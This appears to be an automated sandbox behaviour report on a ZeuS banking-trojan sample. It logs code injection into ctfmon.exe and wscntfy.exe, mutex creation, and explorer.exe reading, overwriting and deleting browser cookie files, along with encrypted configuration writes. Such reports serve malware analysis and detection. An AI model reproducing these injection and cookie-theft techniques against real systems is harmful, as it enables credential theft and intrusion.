Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: A30000 Length: 159744 Value: 4D 5A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 03 00 31 60 2D 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 08 02 00 00 3A 00 00 00 00 00 success or wait 1998976573
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: A52D50 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1998979257
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: A52000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1998979556
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: A52D50 Length: 4 Value: 00 00 00 00 success or wait 1999039382
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: A52D64 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999039692
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: A52000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999039995
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: A52D64 Length: 4 Value: 00 00 A3 00 success or wait 1999095052
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: A53214 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999095960
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: A53000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999096721
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: A53214 Length: 4 Value: 70 01 00 00 success or wait 1999156272
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: A53218 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999156749
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: A53000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999157195
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: A53218 Length: 4 Value: 74 01 00 00 success or wait 1999215777
Thread created PID: 1828 TID: 1656 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\ctfmon.exe Injected: true success or wait 1999276533
Thread resumed TID: 1656 PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe success or wait 1999277445
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-0651-CCC3F0807706} success or wait 2000031154
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-3A51-CCC3CC807706} success or wait 2000032170
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-0257-CCC3F4867706} success or wait 2000033164
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-2A50-CCC3DC817706} success or wait 2000034129
Memory allocated PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: AE0000 Length: 12F850 Allocation Type: null Protection: page execute and read and write success or wait 2000034634
Memory allocated PID: 224 Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Base: B53000 Length: 12F5FC Allocation Type: null Protection: page read and write success or wait 2000034977
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: AE0000 Length: 27000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2000036549
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: AE0000 Length: 27000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2000036916
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: AE0000 Length: 159744 Value: 4D 5A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 03 00 31 60 2D 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 08 02 00 00 3A 00 00 00 00 00 success or wait 2001424232
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: B02D50 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2001430921
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: B02000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2001431466
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: B02D50 Length: 4 Value: 00 00 00 00 success or wait 2001494517
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: B02D64 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2001495237
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: B02000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2001495919
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: B02D64 Length: 4 Value: 00 00 AE 00 success or wait 2001557133
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: B03214 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2001557550
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: B03000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2001557892
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: B03214 Length: 4 Value: 9C 00 00 00 success or wait 2001580889
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: B03218 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2001588255
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: B03000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2001588597
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: B03218 Length: 4 Value: A0 00 00 00 success or wait 2001601163
Thread created PID: 236 TID: 2512 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\wscntfy.exe Injected: true success or wait 2001647960
Thread resumed TID: 2512 PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe success or wait 2001648912
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1252-CCC3E4837706} success or wait 2002409322
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-A654-CCC350857706} success or wait 2002410340
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1657-CCC3E0867706} success or wait 2002411331
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-7658-CCC380897706} success or wait 2002412358
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1E58-CCC3E8897706} success or wait 2002413337
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-6E57-CCC398867706} success or wait 2002415165
Memory allocated PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: BF0000 Length: 12F850 Allocation Type: null Protection: page execute and read and write success or wait 2002415689
Memory allocated PID: 224 Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Base: B53000 Length: 12F5FC Allocation Type: null Protection: page read and write success or wait 2002416038
Thread created PID: 1960 TID: 2544 EIP: 7C8106F9 Imagepath: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Injected: true success or wait 2002709183
Thread resumed TID: 2544 PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe success or wait 2002710018
System info queried Type: ProcessInformation success or wait 2002941842
Section loaded Path: none Access: query and write and read Type: commit Baseaddress: BD0000 Size: 16384 Protection: read write Mapped to pid: own pid success or wait 2002949192
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-C250-CCC334817706} success or wait 2002951532
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-AE51-CCC358807706} success or wait 2002952582
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-A252-CCC354837706} success or wait 2002953541
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-BA52-CCC34C837706} success or wait 2002954485
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-6E52-CCC398837706} success or wait 2002955415
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-7252-CCC384837706} success or wait 2002956351
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-BA53-CCC34C827706} success or wait 2002957324
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-0E53-CCC3F8827706} success or wait 2002958410
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-DA54-CCC32C857706} success or wait 2002959377
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-8A54-CCC37C857706} success or wait 2002960397
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-BE54-CCC348857706} success or wait 2002961367
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1E55-CCC3E8847706} success or wait 2002962335
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-0651-CCC3F0807706} success or wait 2002964211
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-3A51-CCC3CC807706} success or wait 2002965174
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-0257-CCC3F4867706} success or wait 2002966154
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1252-CCC3E4837706} success or wait 2002967546
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-A654-CCC350857706} success or wait 2002968520
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1657-CCC3E0867706} success or wait 2002969499
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-7658-CCC380897706} success or wait 2002970515
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1E58-CCC3E8897706} success or wait 2002971489
Process terminated PID: 224 Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe success or wait 2002974175
+ Sections
+ General
Start time: 06:06:39
Start date: 01/12/2011
Path: C:\WINDOWS\explorer.exe
Commandline: C:\WINDOWS\Explorer.EXE
Imagebase: 0x1000000
File size: 1033728 bytes
MD5 hash: 12896823FB95BFB3DC9B46BCAEDC9923
File Activities:
+ File opened
File Path Access Options Content overwritten Completion Count Source Address
C:\Documents and Settings\Administrator\Cookies\administrator@ad.wsod[2].txt write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@adobe[1].txt write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@adobe[2].txt write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[1].txt write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[2].txt write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[3].txt write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@bing[1].txt write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@bing[2].txt write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@c.bing[1].txt write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[1].txt write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[2].txt write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[3].txt write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@ch.msn[1].txt write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@doubleclick[1].txt write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@ivwbox[2].txt write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@live[1].txt write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@live[2].txt write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[1].txt write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[2].txt write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[3].txt write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@msn[1].txt write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@msn[2].txt write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@msn[3].txt write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@rad.msn[2].txt write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[1].txt write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[2].txt write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[4].txt write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@wemfbox[2].txt write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@www.bing[1].txt write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@www.bing[2].txt write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.tmp write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Application Data\Foluv write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8B374
C:\Documents and Settings\Administrator\Application Data\Qiokze write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8B374
C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.dat read attributes and synchronize and generic read synchronous io non alert and non directory file false object name not found 1 1F846EA
C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.sei read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F7FAC3
C:\Documents and Settings\Administrator\Cookies\administrator@ad.wsod[2].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F8AE9D
C:\Documents and Settings\Administrator\Cookies\administrator@adobe[1].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F8AE9D
C:\Documents and Settings\Administrator\Cookies\administrator@adobe[2].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F8AE9D
C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[1].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F8AE9D
C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[2].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F8AE9D
C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[3].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F8AE9D
C:\Documents and Settings\Administrator\Cookies\administrator@bing[1].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F8AE9D
C:\Documents and Settings\Administrator\Cookies\administrator@bing[2].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F8AE9D
C:\Documents and Settings\Administrator\Cookies\administrator@c.bing[1].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F8AE9D
C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[1].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F8AE9D
C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[2].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F8AE9D
C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[3].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F8AE9D
C:\Documents and Settings\Administrator\Cookies\administrator@ch.msn[1].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F8AE9D
C:\Documents and Settings\Administrator\Cookies\administrator@doubleclick[1].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F8AE9D
C:\Documents and Settings\Administrator\Cookies\administrator@ivwbox[2].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F8AE9D
C:\Documents and Settings\Administrator\Cookies\administrator@live[1].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F8AE9D
C:\Documents and Settings\Administrator\Cookies\administrator@live[2].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F8AE9D
C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[1].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F8AE9D
C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[2].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F8AE9D
C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[3].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F8AE9D
C:\Documents and Settings\Administrator\Cookies\administrator@msn[1].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F8AE9D
C:\Documents and Settings\Administrator\Cookies\administrator@msn[2].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F8AE9D
C:\Documents and Settings\Administrator\Cookies\administrator@msn[3].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F8AE9D
C:\Documents and Settings\Administrator\Cookies\administrator@rad.msn[2].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F8AE9D
C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[1].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F8AE9D
C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[2].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F8AE9D
C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[4].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F8AE9D
C:\Documents and Settings\Administrator\Cookies\administrator@wemfbox[2].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F8AE9D
C:\Documents and Settings\Administrator\Cookies\administrator@www.bing[1].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F8AE9D
C:\Documents and Settings\Administrator\Cookies\administrator@www.bing[2].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F8AE9D
C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.tmp read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F7FAC3
C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.tmp read attributes and synchronize and generic read and generic write synchronous io non alert and non directory file false success or wait 1 1F8BAED
+ File created
File Path Access Attributes Options Completion Count Source Address
C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.sei read attributes and synchronize and generic read and generic write normal synchronous io non alert and non directory file success or wait 1 1F8BAED
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp4d94e4d7.bat read attributes and synchronize and generic write normal synchronous io non alert and non directory file success or wait 2 1F8AE2D
+ File deleted
File Path Completion Count Source Address
C:\Documents and Settings\Administrator\Cookies\administrator@ad.wsod[2].txt success or wait 1 1F8AFD1
C:\Documents and Settings\Administrator\Cookies\administrator@adobe[1].txt success or wait 1 1F8AFD1
C:\Documents and Settings\Administrator\Cookies\administrator@adobe[2].txt success or wait 1 1F8AFD1
C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[1].txt success or wait 1 1F8AFD1
C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[2].txt success or wait 1 1F8AFD1
C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[3].txt success or wait 1 1F8AFD1
C:\Documents and Settings\Administrator\Cookies\administrator@bing[1].txt success or wait 1 1F8AFD1
C:\Documents and Settings\Administrator\Cookies\administrator@bing[2].txt success or wait 1 1F8AFD1
C:\Documents and Settings\Administrator\Cookies\administrator@c.bing[1].txt success or wait 1 1F8AFD1
C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[1].txt success or wait 1 1F8AFD1
C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[2].txt success or wait 1 1F8AFD1
C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[3].txt success or wait 1 1F8AFD1
C:\Documents and Settings\Administrator\Cookies\administrator@ch.msn[1].txt success or wait 1 1F8AFD1
+ File renamed
Old File Path New File Path Completion Count Source Address
C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.sei TRUE success or wait 1 1F7FB39
+ File written
File Path Offset Length Value Completion Count Source Address
C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.sei none 5 3E C9 07 4F 00 success or wait 1 1F8BC97
C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.sei none 2623 A7 7C 90 C9 22 56 2F F9 40 3C 90 C5 A3 70 CA 24 B8 36 1D E6 A0 E4 98 0D 1E 3A B9 C1 17 8A C8 0D CD FE 7A B8 8C 5C 4E 10 3D 0D AD B6 E5 FE 11 67 49 E5 F2 78 E5 CA B0 59 41 BA 45 99 4C 71 1F 90 E6 53 C5 E3 2B 6A F6 BD 62 D6 0A EA DC 25 05 3B DA 17 2A 03 31 83 0F F4 3B 88 3D 11 62 59 0A 78 3A FC B6 80 success or wait 1 1F8BCB0
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin none 4096 E8 C1 69 AB 94 52 1E 42 DD C3 DA FA EB 82 38 2A B0 03 29 3A 73 7F 61 22 EC 5F 7B E6 1F F6 F6 81 FE 5D B8 7D 34 14 36 02 95 58 0C 87 50 BC 83 6D DF 05 38 CE BC 67 16 7D 31 6E 30 C4 6E 8C 79 D4 89 44 F5 FC 05 4C CC 6A 75 74 38 5E 51 74 C5 E3 7A 6D 52 F7 F8 3C 52 43 7E CE B5 41 E0 E8 B0 C8 0D B9 6D 80 success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin none 4096 4B A0 43 33 C1 56 F2 0D 6D 52 6F D7 8D 83 39 5D C1 F9 66 58 E3 98 C7 F3 71 C2 06 68 82 AF 9D 81 FF BE 63 E1 5F A8 52 D2 90 C3 E9 24 3D 78 5F 5D 79 66 A8 56 C3 F2 73 44 CF E3 1E 10 22 3A CC 01 66 54 46 51 88 FA 51 47 33 1C 46 77 81 CC A8 08 1C 68 AA A3 A2 49 1E 71 ED B4 08 B0 D9 BF FE 80 A5 A4 E0 5E success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin none 4096 AD 0F E4 12 EE 04 3B C8 AB 15 36 28 0D 06 3B 69 EE 2C 34 F2 B3 4F F9 F3 E9 08 DE AD DF B9 81 B3 8B A0 AD 09 9B FE 6A 6A 2C 25 4A 46 90 80 F1 7A 5E CE 5A 09 5C 0A 51 0B D0 10 EA 6A AB DF AF 4A 51 89 6E BB 3B 58 74 5F 1E 5B 74 DA 80 AA 25 47 3B 6E AF AE E5 A5 79 4E 8A EF 85 43 27 0B A1 99 F1 53 BD AD success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin none 4096 40 7A AA FC DC 6F 3E FD A6 8D F1 9E 4D 06 D4 91 0E F6 DF BE 36 13 0E C4 87 9F CC AD BC FA C4 B3 7D 98 B6 30 8E A3 CB 3C 56 8D AD 7D CD E4 9B 60 6C B4 0B DE 81 11 A6 60 25 10 A9 B5 A4 67 DD 5B 28 D1 CF 5E AD AF 85 88 49 2A 72 F6 11 20 D3 A0 36 42 9A B4 20 69 22 FD 97 B3 EB 12 54 17 66 09 E7 99 79 B4 success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin none 4096 69 0A 5D 0F E8 28 EF D7 83 3F D5 75 BB 9E B2 D6 1E AB 97 EB C2 FD A9 AA 75 FF 38 73 9F 6E F6 93 64 69 0D 8E 6F 8F 20 72 19 86 E9 9D BF 5A 51 91 56 D2 82 06 3A EB E5 3F BF C8 D7 D5 BE F5 ED 95 12 F1 7F CF A4 41 CF 62 94 06 A1 E1 C8 F7 70 32 0A E9 5B CA CC CD EC 60 E4 22 99 22 D4 56 96 38 EB 55 42 97 success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin none 4096 06 E6 19 3F F2 33 1F 1F 6E 49 0C 0F BB 9D 5B B0 7B AF AF 26 F2 57 DB 20 4C 9F 88 97 15 B1 77 C8 7A 04 D9 06 C8 77 42 58 16 4B CA F6 87 57 6B 22 61 AC 13 88 B4 D6 0A 4D 35 9C F3 E1 75 40 D0 6C 9F 65 27 7F 56 1C 67 C9 FF 08 21 A7 D0 88 D0 87 B0 C7 CB 4F 2A 32 DA 07 C4 F3 32 9D E1 AF 47 11 B7 86 1D 26 success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin none 4096 F5 0A 07 02 C0 AD 24 83 3D ED 6B 4A EB 83 BA 5E 31 C1 6A 1F 83 E6 CB 3C 91 E1 9B FA 32 AD 28 4D BC D6 4B EF D1 E2 13 83 C3 4D 11 94 AA 3F 75 87 FC EB 0B 01 DC 20 C0 71 44 74 D8 BF CB 6B 24 CD B0 A4 58 6D C2 8B 7E C5 09 4E 3F F1 B0 C2 23 B4 54 92 9A 21 EA 50 BB 3A 96 14 06 D2 D2 3C 6F F9 D8 EC 83 EE success or wait 1 1F87A65
